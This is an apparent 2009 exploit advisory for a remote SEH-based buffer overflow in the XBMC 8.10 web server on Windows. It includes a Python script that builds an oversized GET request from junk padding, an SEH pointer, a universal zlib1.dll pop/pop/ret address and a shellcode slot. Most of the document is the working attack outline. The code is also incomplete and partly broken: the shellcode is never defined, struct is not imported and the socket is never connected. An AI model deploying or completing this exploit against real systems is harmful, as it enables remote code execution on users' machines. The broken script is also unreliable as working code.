Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!!
Tested:Win xp sp2 eng Win vista sp1
Release date:April the 4th 2009
versions affected: windows all versions.
I had tried awhile to get a nice pop ebx pop ret address and just
could not find a suitable one especially that was any good.and it
had to be shipped with the application and not have /safe seh.
To start with i looked at the zlib.dll to see of there were any
nice pop pop ret address i noticed there was one in particular that
stood out and decided to try it.
There is no need for me to release any more exploits for this application
as i have covered all the areas which i wanted to and want to
move on from this.
If your interested to see how this worked attach a debugger and add some
hit tracing :).It is possible to use this with all the buffer overflows
Credits to n00b for finding the buffer overflow and writing
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
import sys, socket
port = 80
host = sys.argv
Junk_buffer1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Module Name=C:\Program Files\XBMC\zlib1.dll
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)
Junk_buffer3 = 'D'*635
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
Request = (Junk_buffer1 + Pointer_To_Next_SEH + SE_Handler + Shell_code + Junk_buffer3)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")